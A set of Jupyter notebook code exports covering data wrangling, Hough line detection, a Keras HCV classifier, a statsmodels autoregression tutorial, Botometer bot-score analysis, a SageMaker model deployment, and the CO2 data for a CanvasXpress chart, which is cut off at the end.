final_df.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv')
```
### Cell Description
Below cell creates and stores a dataframe which contains latest entry when user uninstalled the app, leaving any previous uninstall records.
```
uninstall_unique = pd.DataFrame()
uninstall = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/AppUninstalled.csv')
uninstall['Date'] = pd.to_datetime(uninstall['Date'].apply(lambda x:inttostr(x)))
for uid in tqdm(userids):
temp = uninstall.loc[uninstall.UserId==uid]
temp = temp[temp.Date==temp.Date.max()]
uninstall_unique = pd.concat([uninstall_unique,temp])
uninstall_unique.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/uninstall_unique.csv')
import matplotlib.pyplot as plt
%matplotlib inline
temp.VideoId.value_counts().plot(kind='hist',bins=2000)
plt.xlim(0,1000)
```
|
github_jupyter
|
```
import os
import cv2
import numpy as np
#import layers
import matplotlib.pyplot as plt
# credits to https://towardsdatascience.com/lines-detection-with-hough-transform-84020b3b1549
import matplotlib.lines as mlines
# ist a,b == m, c
def line_detection_non_vectorized(image, edge_image, num_rhos=100, num_thetas=100, t_count=220):
edge_height, edge_width = edge_image.shape[:2]
edge_height_half, edge_width_half = edge_height / 2, edge_width / 2
#
d = np.sqrt(np.square(edge_height) + np.square(edge_width))
dtheta = 180 / num_thetas
drho = (2 * d) / num_rhos
#
thetas = np.arange(0, 180, step=dtheta)
rhos = np.arange(-d, d, step=drho)
#
cos_thetas = np.cos(np.deg2rad(thetas))
sin_thetas = np.sin(np.deg2rad(thetas))
#
accumulator = np.zeros((len(rhos), len(rhos)))
#
figure = plt.figure(figsize=(12, 12))
subplot1 = figure.add_subplot(1, 4, 1)
subplot1.imshow(image, cmap="gray")
subplot2 = figure.add_subplot(1, 4, 2)
subplot2.imshow(edge_image, cmap="gray")
subplot3 = figure.add_subplot(1, 4, 3)
subplot3.set_facecolor((0, 0, 0))
subplot4 = figure.add_subplot(1, 4, 4)
subplot4.imshow(image, cmap="gray")
#
for y in range(edge_height):
for x in range(edge_width):
if edge_image[y][x] != 0:
edge_point = [y - edge_height_half, x - edge_width_half]
ys, xs = [], []
for theta_idx in range(len(thetas)):
rho = (edge_point[1] * cos_thetas[theta_idx]) + (edge_point[0] * sin_thetas[theta_idx])
theta = thetas[theta_idx]
rho_idx = np.argmin(np.abs(rhos - rho))
accumulator[rho_idx][theta_idx] += 1
ys.append(rho)
xs.append(theta)
subplot3.plot(xs, ys, color="white", alpha=0.05)
line_results = list()
for y in range(accumulator.shape[0]):
for x in range(accumulator.shape[1]):
if accumulator[y][x] > t_count:
rho = rhos[y]
theta = thetas[x]
#print(theta)
a = np.cos(np.deg2rad(theta))
b = np.sin(np.deg2rad(theta))
x0 = (a * rho) + edge_width_half
#print(x0)
y0 = (b * rho) + edge_height_half
#print(y0)
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
#print([x1, x2])
#print([y1, y2])
#print("###")
subplot3.plot([theta], [rho], marker='o', color="yellow")
line_results.append([(x1,y1), (x2,y2)])
subplot4.add_line(mlines.Line2D([x1, x2], [y1, y2]))
subplot3.invert_yaxis()
subplot3.invert_xaxis()
subplot1.title.set_text("Original Image")
subplot2.title.set_text("Edge Image")
subplot3.title.set_text("Hough Space")
subplot4.title.set_text("Detected Lines")
plt.show()
return accumulator, rhos, thetas, line_results
img = cv2.imread(f"C:/Users/fredi/Desktop/Uni/SELS2/github/dronelab/simulation/simulated_data/1.png", cv2.IMREAD_GRAYSCALE)
#img = cv2.imread(img_dir, cv2.IMREAD_GRAYSCALE)
print(img.shape)
plt.imshow(img, "gray")
plt.show()
edge_image = cv2.Canny(img, 100, 200)
acc, rhos, thetas, line_results = line_detection_non_vectorized(img, edge_image, t_count=1000)
def merge_lines(edge_image, lines):
results = list()
agg = np.zeros(edge_image.shape)*255
edge_image = np.where(edge_image>0, 1, edge_image)
kernel = np.ones((3,3),np.float32)*255
edge_image = cv2.filter2D(edge_image,-1,kernel)
for line in lines:
tmp = np.zeros(edge_image.shape)*255
out = cv2.line(tmp, line[0], line[1], (255,255,255), thickness=1)
results.append(out * edge_image)
plt.imshow(results[-1])
agg = agg + results[-1]
plt.show()
agg = np.where(agg>255, 255, agg)
return results, agg
results, aggregated = merge_lines(edge_image, line_results)
plt.imshow(aggregated)
plt.show()
img2 = cv2.imread(f"C:/Users/fredi/Desktop/Uni/SELS2/hough2/handpicked_rails/2021-07-01-17-07-48/fps_1_frame_018.jpg")
plt.imshow(img2)
plt.show()
edge_image2 = cv2.Canny(img2, 100, 200)
acc, rhos, thetas, line_results2 = line_detection_non_vectorized(img2, edge_image2, t_count=2000)
results, aggregated = merge_lines(edge_image2, line_results2)
plt.imshow(aggregated)
plt.show()
```
|
github_jupyter
|
# Activity 02
```
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from keras.models import Sequential
from keras.layers import Dense
from tensorflow import random
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
# Load The dataset
X = pd.read_csv('../data/HCV_feats.csv')
y = pd.read_csv('../data/HCV_target.csv')
# Print the sizes of the dataset
print("Number of Examples in the Dataset = ", X.shape[0])
print("Number of Features for each example = ", X.shape[1])
print("Possible Output Classes = ", y['AdvancedFibrosis'].unique())
```
Set up a seed for random number generator so the result will be reproducible
Split the dataset into training set and test set with a 80-20 ratio
```
seed = 1
np.random.seed(seed)
random.set_seed(seed)
sc = StandardScaler()
X = pd.DataFrame(sc.fit_transform(X), columns=X.columns)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=seed)
# Print the information regarding dataset sizes
print(X_train.shape)
print(y_train.shape)
print(X_test.shape)
print(y_test.shape)
print ("Number of examples in training set = ", X_train.shape[0])
print ("Number of examples in test set = ", X_test.shape[0])
np.random.seed(seed)
random.set_seed(seed)
# define the keras model
classifier = Sequential()
classifier.add(Dense(units = 3, activation = 'tanh', input_dim=X_train.shape[1]))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
classifier.compile(optimizer = 'sgd', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.summary()
# train the model while storing all loss values
history=classifier.fit(X_train, y_train, batch_size = 20, epochs = 100, validation_split=0.1, shuffle=False)
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
# plot training error and test error plots
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train loss', 'validation loss'], loc='upper right')
# print the best accuracy reached on training set and the test set
print(f"Best Accuracy on training set = {max(history.history['accuracy'])*100:.3f}%")
print(f"Best Accuracy on validation set = {max(history.history['val_accuracy'])*100:.3f}%")
test_loss, test_acc = classifier.evaluate(X_test, y_test['AdvancedFibrosis'])
print(f'The loss on the test set is {test_loss:.4f} and the accuracy is {test_acc*100:.3f}%')
# set up a seed for random number generator so the result will be reproducible
np.random.seed(seed)
random.set_seed(seed)
# define the keras model
classifier = Sequential()
classifier.add(Dense(units = 4, activation = 'tanh', input_dim = X_train.shape[1]))
classifier.add(Dense(units = 2, activation = 'tanh'))
classifier.add(Dense(units = 1, activation = 'sigmoid'))
classifier.compile(optimizer = 'sgd', loss = 'binary_crossentropy', metrics = ['accuracy'])
classifier.summary()
# train the model while storing all loss values
history=classifier.fit(X_train, y_train, batch_size = 20, epochs = 100, validation_split=0.1, shuffle=False)
# plot training error and test error plots
matplotlib.rcParams['figure.figsize'] = (10.0, 8.0)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train loss', 'validation loss'], loc='upper right')
# print the best accuracy reached on training set and the test set
print(f"Best Accuracy on training set = {max(history.history['accuracy'])*100:.3f}%")
print(f"Best Accuracy on test set = {max(history.history['val_accuracy'])*100:.3f}%")
test_loss, test_acc = classifier.evaluate(X_test, y_test['AdvancedFibrosis'])
print(f'The loss on the test set is {test_loss:.4f} and the accuracy is {test_acc*100:.3f}%')
```
|
github_jupyter
|
# Autoregressions
This notebook introduces autoregression modeling using the `AutoReg` model. It also covers aspects of `ar_select_order` assists in selecting models that minimize an information criteria such as the AIC.
An autoregressive model has dynamics given by
$$ y_t = \delta + \phi_1 y_{t-1} + \ldots + \phi_p y_{t-p} + \epsilon_t. $$
`AutoReg` also permits models with:
* Deterministic terms (`trend`)
* `n`: No deterministic term
* `c`: Constant (default)
* `ct`: Constant and time trend
* `t`: Time trend only
* Seasonal dummies (`seasonal`)
* `True` includes $s-1$ dummies where $s$ is the period of the time series (e.g., 12 for monthly)
* Custom deterministic terms (`deterministic`)
* Accepts a `DeterministicProcess`
* Exogenous variables (`exog`)
* A `DataFrame` or `array` of exogenous variables to include in the model
* Omission of selected lags (`lags`)
* If `lags` is an iterable of integers, then only these are included in the model.
The complete specification is
$$ y_t = \delta_0 + \delta_1 t + \phi_1 y_{t-1} + \ldots + \phi_p y_{t-p} + \sum_{i=1}^{s-1} \gamma_i d_i + \sum_{j=1}^{m} \kappa_j x_{t,j} + \epsilon_t. $$
where:
* $d_i$ is a seasonal dummy that is 1 if $mod(t, period) = i$. Period 0 is excluded if the model contains a constant (`c` is in `trend`).
* $t$ is a time trend ($1,2,\ldots$) that starts with 1 in the first observation.
* $x_{t,j}$ are exogenous regressors. **Note** these are time-aligned to the left-hand-side variable when defining a model.
* $\epsilon_t$ is assumed to be a white noise process.
This first cell imports standard packages and sets plots to appear inline.
```
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import pandas_datareader as pdr
import seaborn as sns
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from statsmodels.tsa.api import acf, pacf, graphics
```
This cell sets the plotting style, registers pandas date converters for matplotlib, and sets the default figure size.
```
sns.set_style('darkgrid')
pd.plotting.register_matplotlib_converters()
# Default figure size
sns.mpl.rc('figure',figsize=(16, 6))
```
The first set of examples uses the month-over-month growth rate in U.S. Housing starts that has not been seasonally adjusted. The seasonality is evident by the regular pattern of peaks and troughs. We set the frequency for the time series to "MS" (month-start) to avoid warnings when using `AutoReg`.
```
data = pdr.get_data_fred('HOUSTNSA', '1959-01-01', '2019-06-01')
housing = data.HOUSTNSA.pct_change().dropna()
# Scale by 100 to get percentages
housing = 100 * housing.asfreq('MS')
fig, ax = plt.subplots()
ax = housing.plot(ax=ax)
```
We can start with an AR(3). While this is not a good model for this data, it demonstrates the basic use of the API.
```
mod = AutoReg(housing, 3, old_names=False)
res = mod.fit()
print(res.summary())
```
`AutoReg` supports the same covariance estimators as `OLS`. Below, we use `cov_type="HC0"`, which is White's covariance estimator. While the parameter estimates are the same, all of the quantities that depend on the standard error change.
```
res = mod.fit(cov_type="HC0")
print(res.summary())
sel = ar_select_order(housing, 13, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
`plot_predict` visualizes forecasts. Here we produce a large number of forecasts which show the string seasonality captured by the model.
```
fig = res.plot_predict(720, 840)
```
`plot_diagnositcs` indicates that the model captures the key features in the data.
```
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(fig=fig, lags=30)
```
## Seasonal Dummies
`AutoReg` supports seasonal dummies which are an alternative way to model seasonality. Including the dummies shortens the dynamics to only an AR(2).
```
sel = ar_select_order(housing, 13, seasonal=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
The seasonal dummies are obvious in the forecasts which has a non-trivial seasonal component in all periods 10 years in to the future.
```
fig = res.plot_predict(720, 840)
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(lags=30, fig=fig)
```
## Seasonal Dynamics
While `AutoReg` does not directly support Seasonal components since it uses OLS to estimate parameters, it is possible to capture seasonal dynamics using an over-parametrized Seasonal AR that does not impose the restrictions in the Seasonal AR.
```
yoy_housing = data.HOUSTNSA.pct_change(12).resample("MS").last().dropna()
_, ax = plt.subplots()
ax = yoy_housing.plot(ax=ax)
```
We start by selecting a model using the simple method that only chooses the maximum lag. All lower lags are automatically included. The maximum lag to check is set to 13 since this allows the model to next a Seasonal AR that has both a short-run AR(1) component and a Seasonal AR(1) component, so that
$$ (1-\phi_s L^{12})(1-\phi_1 L)y_t = \epsilon_t $$
which becomes
$$ y_t = \phi_1 y_{t-1} +\phi_s Y_{t-12} - \phi_1\phi_s Y_{t-13} + \epsilon_t $$
when expanded. `AutoReg` does not enforce the structure, but can estimate the nesting model
$$ y_t = \phi_1 y_{t-1} +\phi_{12} Y_{t-12} - \phi_{13} Y_{t-13} + \epsilon_t. $$
We see that all 13 lags are selected.
```
sel = ar_select_order(yoy_housing, 13, old_names=False)
sel.ar_lags
```
It seems unlikely that all 13 lags are required. We can set `glob=True` to search all $2^{13}$ models that include up to 13 lags.
Here we see that the first three are selected, as is the 7th, and finally the 12th and 13th are selected. This is superficially similar to the structure described above.
After fitting the model, we take a look at the diagnostic plots that indicate that this specification appears to be adequate to capture the dynamics in the data.
```
sel = ar_select_order(yoy_housing, 13, glob=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
fig = plt.figure(figsize=(16,9))
fig = res.plot_diagnostics(fig=fig, lags=30)
```
We can also include seasonal dummies. These are all insignificant since the model is using year-over-year changes.
```
sel = ar_select_order(yoy_housing, 13, glob=True, seasonal=True, old_names=False)
sel.ar_lags
res = sel.model.fit()
print(res.summary())
```
## Industrial Production
We will use the industrial production index data to examine forecasting.
```
data = pdr.get_data_fred('INDPRO', '1959-01-01', '2019-06-01')
ind_prod = data.INDPRO.pct_change(12).dropna().asfreq('MS')
_, ax = plt.subplots(figsize=(16,9))
ind_prod.plot(ax=ax)
```
We will start by selecting a model using up to 12 lags. An AR(13) minimizes the BIC criteria even though many coefficients are insignificant.
```
sel = ar_select_order(ind_prod, 13, 'bic', old_names=False)
res = sel.model.fit()
print(res.summary())
```
We can also use a global search which allows longer lags to enter if needed without requiring the shorter lags. Here we see many lags dropped. The model indicates there may be some seasonality in the data.
```
sel = ar_select_order(ind_prod, 13, 'bic', glob=True, old_names=False)
sel.ar_lags
res_glob = sel.model.fit()
print(res.summary())
```
`plot_predict` can be used to produce forecast plots along with confidence intervals. Here we produce forecasts starting at the last observation and continuing for 18 months.
```
ind_prod.shape
fig = res_glob.plot_predict(start=714, end=732)
```
The forecasts from the full model and the restricted model are very similar. I also include an AR(5) which has very different dynamics
```
res_ar5 = AutoReg(ind_prod, 5, old_names=False).fit()
predictions = pd.DataFrame({"AR(5)": res_ar5.predict(start=714, end=726),
"AR(13)": res.predict(start=714, end=726),
"Restr. AR(13)": res_glob.predict(start=714, end=726)})
_, ax = plt.subplots()
ax = predictions.plot(ax=ax)
```
The diagnostics indicate the model captures most of the the dynamics in the data. The ACF shows a patters at the seasonal frequency and so a more complete seasonal model (`SARIMAX`) may be needed.
```
fig = plt.figure(figsize=(16,9))
fig = res_glob.plot_diagnostics(fig=fig, lags=30)
```
# Forecasting
Forecasts are produced using the `predict` method from a results instance. The default produces static forecasts which are one-step forecasts. Producing multi-step forecasts requires using `dynamic=True`.
In this next cell, we produce 12-step-heard forecasts for the final 24 periods in the sample. This requires a loop.
**Note**: These are technically in-sample since the data we are forecasting was used to estimate parameters. Producing OOS forecasts requires two models. The first must exclude the OOS period. The second uses the `predict` method from the full-sample model with the parameters from the shorter sample model that excluded the OOS period.
```
import numpy as np
start = ind_prod.index[-24]
forecast_index = pd.date_range(start, freq=ind_prod.index.freq, periods=36)
cols = ['-'.join(str(val) for val in (idx.year, idx.month)) for idx in forecast_index]
forecasts = pd.DataFrame(index=forecast_index,columns=cols)
for i in range(1, 24):
fcast = res_glob.predict(start=forecast_index[i], end=forecast_index[i+12], dynamic=True)
forecasts.loc[fcast.index, cols[i]] = fcast
_, ax = plt.subplots(figsize=(16, 10))
ind_prod.iloc[-24:].plot(ax=ax, color="black", linestyle="--")
ax = forecasts.plot(ax=ax)
```
## Comparing to SARIMAX
`SARIMAX` is an implementation of a Seasonal Autoregressive Integrated Moving Average with eXogenous regressors model. It supports:
* Specification of seasonal and nonseasonal AR and MA components
* Inclusion of Exogenous variables
* Full maximum-likelihood estimation using the Kalman Filter
This model is more feature rich than `AutoReg`. Unlike `SARIMAX`, `AutoReg` estimates parameters using OLS. This is faster and the problem is globally convex, and so there are no issues with local minima. The closed-form estimator and its performance are the key advantages of `AutoReg` over `SARIMAX` when comparing AR(P) models. `AutoReg` also support seasonal dummies, which can be used with `SARIMAX` if the user includes them as exogenous regressors.
```
from statsmodels.tsa.api import SARIMAX
sarimax_mod = SARIMAX(ind_prod, order=((1,5,12,13),0, 0), trend='c')
sarimax_res = sarimax_mod.fit()
print(sarimax_res.summary())
sarimax_params = sarimax_res.params.iloc[:-1].copy()
sarimax_params.index = res_glob.params.index
params = pd.concat([res_glob.params, sarimax_params], axis=1, sort=False)
params.columns = ["AutoReg", "SARIMAX"]
params
```
## Custom Deterministic Processes
The `deterministic` parameter allows a custom `DeterministicProcess` to be used. This allows for more complex deterministic terms to be constructed, for example one that includes seasonal components with two periods, or, as the next example shows, one that uses a Fourier series rather than seasonal dummies.
```
from statsmodels.tsa.deterministic import DeterministicProcess
dp = DeterministicProcess(housing.index, constant=True, period=12, fourier=2)
mod = AutoReg(housing,2, trend="n",seasonal=False, deterministic=dp)
res = mod.fit()
print(res.summary())
fig = res.plot_predict(720, 840)
```
|
github_jupyter
|
```
import os
import pandas as pd
import math
import nltk
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
import re
from nltk.tokenize import WordPunctTokenizer
import pickle
def load_csv_as_df(file_name, sub_directories, col_name=None):
'''
Load any csv as a pandas dataframe. Provide the filename, the subdirectories, and columns to read(if desired).
'''
# sub_directories = '/Data/'
base_path = os.getcwd()
full_path = base_path + sub_directories + file_name
if col_name is not None:
return pd.read_csv(full_path, usecols=[col_name])
# print('Full Path: ', full_path)
return pd.read_csv(full_path, header=0)
def describe_bots(df, return_dfs=False, for_timeline=False):
if for_timeline:
df = df.drop_duplicates(subset='user_id', keep='last')
bot_df = df[df.user_cap >= 0.53]
human_df = df[df.user_cap < 0.4]
removed_df = df[(df['user_cap'] >= 0.4) & (df['user_cap'] <= 0.53)]
else:
bot_df = df[df.cap >= 0.53]
human_df = df[df.cap < 0.4]
removed_df = df[(df['cap'] >= 0.4) & (df['cap'] <= 0.53)]
bot_percent = len(bot_df)/len(df) * 100
human_percent = len(human_df)/len(df) * 100
removed_percent = len(removed_df)/len(df) * 100
print('There are ', len(df), 'total records')
print('There are ', len(bot_df), 'Bots in these records')
print('Percentage of total accounts that are bots = ' + str(round(bot_percent, 2)) + '%')
print('Percentage of total accounts that are humans = ' + str(round(human_percent, 2)) + '%')
print('Percentage of total accounts that were removed = ' + str(round(removed_percent, 2)) + '%')
if return_dfs:
return bot_df, human_df, removed_df
def get_top_five_percent(df):
number_of_accounts = len(df)
top5 = int(number_of_accounts * 0.05)
print("num accounts: ", number_of_accounts)
print("top5: ", top5)
top_df = df.cap.nlargest(top5)
min_cap = top_df.min()
return min_cap
master_df = load_csv_as_df('MasterIDs-4.csv', '/Data/Master-Data/')
error_df = load_csv_as_df('ErrorIDs-4.csv', '/Data/Master-Data/')
bot_df, human_df, removed_df = describe_bots(master_df, return_dfs=True)
print(len(error_df))
min_cap = get_top_five_percent(master_df)
print(min_cap)
fig, ax = plt.subplots(figsize=(8, 5))
ax.grid(False)
ax.set_title('Botometer CAP Score Distribution')
plt.hist(master_df.cap, bins=10, color='b', edgecolor='k')
plt.xlabel("CAP Score")
plt.ylabel("Number of Accounts")
plt.axvline(master_df.cap.mean(), color='y', linewidth=2.5, label='Average CAP Score')
min_cap = get_top_five_percent(master_df)
plt.axvline(x=min_cap, color='orange', linewidth=2.5, linestyle='dashed', label='95th Percentile')
plt.axvline(x=0.4, color='g', linewidth=2.5, label='Human Threshold')
plt.axvline(x=0.53, color='r', linewidth=2.5, label='Bot Threshold')
plt.legend()
plt.savefig('Botometer CAP Score Frequency.png', bbox_inches='tight')
plt.scatter(master_df.cap, master_df.bot_score)
```
|
github_jupyter
|
# Deploy the Model
The pipeline that was executed created a Model Package version within the specified Model Package Group. Of particular note, the registration of the model/creation of the Model Package was done so with approval status as `PendingManualApproval`.
As part of SageMaker Pipelines, data scientists can register the model with approved/pending manual approval as part of the CI/CD workflow.
We can also approve the model using the SageMaker Studio UI or programmatically as shown below.
```
from botocore.exceptions import ClientError
import os
import sagemaker
import logging
import boto3
import sagemaker
import pandas as pd
sess = sagemaker.Session()
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()
region = boto3.Session().region_name
sm = boto3.Session().client(service_name="sagemaker", region_name=region)
%store -r pipeline_name
print(pipeline_name)
%%time
import time
from pprint import pprint
executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)["PipelineExecutionSummaries"]
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
print(pipeline_execution_status)
while pipeline_execution_status == "Executing":
try:
executions_response = sm.list_pipeline_executions(PipelineName=pipeline_name)["PipelineExecutionSummaries"]
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
# print('Executions for our pipeline...')
# print(pipeline_execution_status)
except Exception as e:
print("Please wait...")
time.sleep(30)
pprint(executions_response)
```
# List Pipeline Execution Steps
```
pipeline_execution_status = executions_response[0]["PipelineExecutionStatus"]
print(pipeline_execution_status)
pipeline_execution_arn = executions_response[0]["PipelineExecutionArn"]
print(pipeline_execution_arn)
from pprint import pprint
steps = sm.list_pipeline_execution_steps(PipelineExecutionArn=pipeline_execution_arn)
pprint(steps)
```
# View Registered Model
```
for execution_step in steps["PipelineExecutionSteps"]:
if execution_step["StepName"] == "RegisterModel":
model_package_arn = execution_step["Metadata"]["RegisterModel"]["Arn"]
break
print(model_package_arn)
model_package_update_response = sm.update_model_package(
ModelPackageArn=model_package_arn,
ModelApprovalStatus="Approved", # Other options are Rejected and PendingManualApproval
)
```
# View Created Model
```
for execution_step in steps["PipelineExecutionSteps"]:
if execution_step["StepName"] == "CreateModel":
model_arn = execution_step["Metadata"]["Model"]["Arn"]
break
print(model_arn)
model_name = model_arn.split("/")[-1]
print(model_name)
```
# Create Model Endpoint from Model Registry
More details here: https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry-deploy.html
```
import time
timestamp = int(time.time())
model_from_registry_name = "bert-model-from-registry-{}".format(timestamp)
print("Model from registry name : {}".format(model_from_registry_name))
model_registry_package_container = {
"ModelPackageName": model_package_arn,
}
from pprint import pprint
create_model_from_registry_respose = sm.create_model(
ModelName=model_from_registry_name, ExecutionRoleArn=role, PrimaryContainer=model_registry_package_container
)
pprint(create_model_from_registry_respose)
model_from_registry_arn = create_model_from_registry_respose["ModelArn"]
model_from_registry_arn
endpoint_config_name = "bert-model-from-registry-epc-{}".format(timestamp)
print(endpoint_config_name)
create_endpoint_config_response = sm.create_endpoint_config(
EndpointConfigName=endpoint_config_name,
ProductionVariants=[
{
"InstanceType": "ml.m4.xlarge",
"InitialVariantWeight": 1,
"InitialInstanceCount": 1,
"ModelName": model_name,
"VariantName": "AllTraffic",
}
],
)
pipeline_endpoint_name = "bert-model-from-registry-ep-{}".format(timestamp)
print("EndpointName={}".format(pipeline_endpoint_name))
# create_endpoint_response = sm.create_endpoint(
# EndpointName=pipeline_endpoint_name, EndpointConfigName=endpoint_config_name
# )
# print(create_endpoint_response["EndpointArn"])
# from IPython.core.display import display, HTML
# display(
# HTML(
# '<b>Review <a target="blank" href="https://console.aws.amazon.com/sagemaker/home?region={}#/endpoints/{}">SageMaker REST Endpoint</a></b>'.format(
# region, pipeline_endpoint_name
# )
# )
# )
%store pipeline_endpoint_name
```
# _Wait Until the Endpoint is Deployed_
```
# %%time
# waiter = sm.get_waiter("endpoint_in_service")
# waiter.wait(EndpointName=pipeline_endpoint_name)
```
# _Wait Until the Endpoint ^^ Above ^^ is Deployed_
# Predict the star_rating with Ad Hoc review_body Samples¶
```
# import json
# from sagemaker.tensorflow.model import TensorFlowPredictor
# from sagemaker.serializers import JSONLinesSerializer
# from sagemaker.deserializers import JSONLinesDeserializer
# predictor = TensorFlowPredictor(
# endpoint_name=pipeline_endpoint_name,
# sagemaker_session=sess,
# model_name="saved_model",
# model_version=0,
# accept_type="application/jsonlines",
# serializer=JSONLinesSerializer(),
# deserializer=JSONLinesDeserializer(),
# )
# inputs = [{"features": ["This is great!"]}, {"features": ["This is bad."]}]
# predicted_classes = predictor.predict(inputs)
# for predicted_class in predicted_classes:
# print("Predicted star_rating: {}".format(predicted_class))
```
# Release Resources
```
# sm.delete_endpoint(
# EndpointName=pipeline_endpoint_name
# )
%%html
<p><b>Shutting down your kernel for this notebook to release resources.</b></p>
<button class="sm-command-button" data-commandlinker-command="kernelmenu:shutdown" style="display:none;">Shutdown Kernel</button>
<script>
try {
els = document.getElementsByClassName("sm-command-button");
els[0].click();
}
catch(err) {
// NoOp
}
</script>
```
|
github_jupyter
|
# Example: CanvasXpress bubble Chart No. 4
This example page demonstrates how to, using the Python package, create a chart that matches the CanvasXpress online example located at:
https://www.canvasxpress.org/examples/bubble-4.html
This example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.
Everything required for the chart to render is included in the code below. Simply run the code block.
```
from canvasxpress.canvas import CanvasXpress
from canvasxpress.js.collection import CXEvents
from canvasxpress.render.jupyter import CXNoteBook
cx = CanvasXpress(
render_to="bubble4",
data={
"y": {
"vars": [
"CO2"
],
"smps": [
"AFG",
"ALB",
"DZA",
"AND",
"AGO",
"AIA",
"ATG",
"ARG",
"ARM",
"ABW",
"AUS",
"AUT",
"AZE",
"BHS",
"BHR",
"BGD",
"BRB",
"BLR",
"BEL",
"BLZ",
"BEN",
"BMU",
"BTN",
"BOL",
"BIH",
"BWA",
"BRA",
"VGB",
"BRN",
"BGR",
"BFA",
"BDI",
"KHM",
"CMR",
"CAN",
"CPV",
"CAF",
"TCD",
"CHL",
"CHN",
"COL",
"COM",
"COG",
"COK",
"CRI",
"HRV",
"CUB",
"CYP",
"CZE",
"COD",
"DNK",
"DJI",
"DOM",
"ECU",
"EGY",
"SLV",
"GNQ",
"ERI",
"EST",
"ETH",
"FJI",
"FIN",
"FRA",
"PYF",
"GAB",
"GMB",
"GEO",
"DEU",
"GHA",
"GRC",
"GRL",
"GRD",
"GTM",
"GIN",
"GNB",
"GUY",
"HTI",
"HND",
"HKG",
"HUN",
"ISL",
"IND",
"IDN",
"IRN",
"IRQ",
"IRL",
"ISR",
"ITA",
"JAM",
"JPN",
"JOR",
"KAZ",
"KEN",
"KIR",
"KWT",
"KGZ",
"LAO",
"LVA",
"LBN",
"LSO",
"LBR",
"LBY",
"LIE",
"LTU",
"LUX",
"MAC",
"MDG",
"MWI",
"MYS",
"MDV",
"MLI",
"MLT",
"MHL",
"MRT",
"MUS",
"MEX",
"MDA",
"MNG",
"MNE",
"MAR",
"MOZ",
"MMR",
"NAM",
"NRU",
"NPL",
"NLD",
"NCL",
"NZL",
"NIC",
"NER",
"NGA",
"NIU",
"PRK",
"MKD",
"NOR",
"OMN",
"PAK",
"PAN",
"PNG",
"PRY",
"PER",
"PHL",
"POL",
"PRT",
"QAT",
"ROU",
"RUS",
"RWA",
"SHN",
"KNA",
"LCA",
"SPM",
"VCT",
"WSM",
"STP",
"SAU",
"SRB",
"SYC",
"SLE",
"SGP",
"SVK",
"SVN",
"SLB",
"SOM",
"KOR",
"SSD",
"ESP",
"LKA",
"SDN",
"SUR",
"SWE",
"CHE",
"SYR",
"TWN",
"TJK",
"TZA",
"THA",
"TLS",
"TGO",
"TON",
"TTO",
"TUN",
"TUR",
"TKM",
"TUV",
"UGA",
"UKR",
"ARE",
"GBR",
"USA",
"URY",
"UZB",
"VUT",
"VEN",
"VNM",
"YEM",
"ZMB",
"ZWE"
],
"data": [
[
10.452666,
5.402999,
164.309295,
0.46421,
37.678605,
0.147145,
0.505574,
185.029897,
6.296603,
0.943234,
415.953947,
66.719678,
37.488394,
2.03001,
31.594487,
85.718805,
1.207134,
61.871676,
100.207836,
0.612205,
7.759753,
0.648945,
1.662172,
22.345503,
22.086102,
6.815418,
466.649304,
0.173555,
9.560399,
43.551599,
4.140342,
0.568028,
15.479031,
7.566796,
586.504635,
0.609509,
0.300478,
1.008035,
85.829114,
9956.568523,
92.228209,
0.245927,
3.518309,
0.072706,
8.249118,
17.718646,
26.084446,
7.332762,
104.411211,
2.231343,
34.65143,
0.389975,
25.305221,
41.817989,
251.460913,
6.018265,
5.90578,
0.708769,
17.710953,
16.184949,
2.123769,
45.849349,
331.725446,
0.780633,
4.803117,
0.56324,
9.862173,
755.362342,
14.479998,
71.797869,
0.511728,
0.278597,
19.411335,
3.032114,
0.308612,
2.342628,
3.366964,
10.470701,
42.505723,
49.628491,
3.674529,
2591.323739,
576.58439,
755.402186,
211.270294,
38.803394,
62.212641,
348.085029,
8.009662,
1135.688,
24.923803,
319.647412,
17.136703,
0.068879,
104.217567,
10.16888,
32.26245,
7.859287,
27.565431,
2.425558,
1.27446,
45.205986,
0.14375,
13.669492,
9.56852,
2.216456,
4.187806,
1.470252,
249.144498,
1.565092,
3.273276,
1.531581,
0.153065,
3.934804,
4.901611,
451.080829,
5.877784,
64.508256,
2.123147,
65.367444,
8.383478,
26.095603,
4.154302,
0.049746,
13.410432,
160.170147,
8.20904,
35.080341,
5.377193,
2.093847,
136.078346,
0.007653,
38.162935,
6.980909,
43.817657,
71.029916,
247.425382,
12.096333,
6.786146,
8.103032,
54.210259,
138.924391,
337.705742,
51.482481,
109.24468,
76.951219,
1691.360426,
1.080098,
0.011319,
0.249014,
0.362202,
0.079232,
0.264106,
0.267864,
0.126126,
576.757836,
46.0531,
